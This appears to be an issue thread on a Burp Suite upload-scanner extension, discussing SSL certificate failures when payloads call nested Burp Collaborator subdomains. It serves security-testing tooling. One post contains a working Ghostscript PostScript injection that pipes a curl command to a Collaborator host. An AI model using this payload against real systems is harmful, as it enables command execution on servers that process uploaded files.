SSL cert. issue in burp collaborator

[Jineeshak]

upload scanner is using https://NN.random_name.burpcollaborator.net/, but the SSL certificate is only valid for *.burpcollaborator.net which will throw a ssl error and the will got connection got interrupted. So instead of using https protocol, it need http

[Jineeshak]

Example:

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl https://NN.3im9vdr1rtg7k5witikj0hc1psvtohd.burpcollaborator.net/) currentdevice putdeviceprops

curl https://NN.3im9vdr1rtg7k5witikj0hc1psvtohd.burpcollaborator.net/ curl: (51) SSL: no alternative certificate subject name matches target host name 'NN.3im9vdr1rtg7k5witikj0hc1psvtohd.burpcollaborator.net'

[floyd-fuh]

Hi there,

So this is nearly never an issue, for the following reasons:

a) the payload is always sent with http:// as well. So what you suggest is already implemented. So far I’ve only seen Imagemagick which supports HTTP but not HTTPS in certain cases, but it’s worth doing both tests usually, which it already does.

b) when curl shows that error, we already get a DNS interaction meaning we already get an issue shown in Burp that shows that the injection was successful. The only exception to this rule is IP based Burp Collaborator servers, which are supported but not recommended for various reasons. And I’m not even sure how well IP based collaborators are supported in Burp and other extensions...

However, there seems to be room for improvement. Instead of doing NN.foobar.burpcollaborator.net this extension could use NNNfoobar.burpcollaborator.net which should probably work but I don’t have a Burp here to test at the moment. Will consider for next release. Thanks for the bug report.

[Jineeshak]

happy to help

[floyd-fuh]

Will be fixed in the next version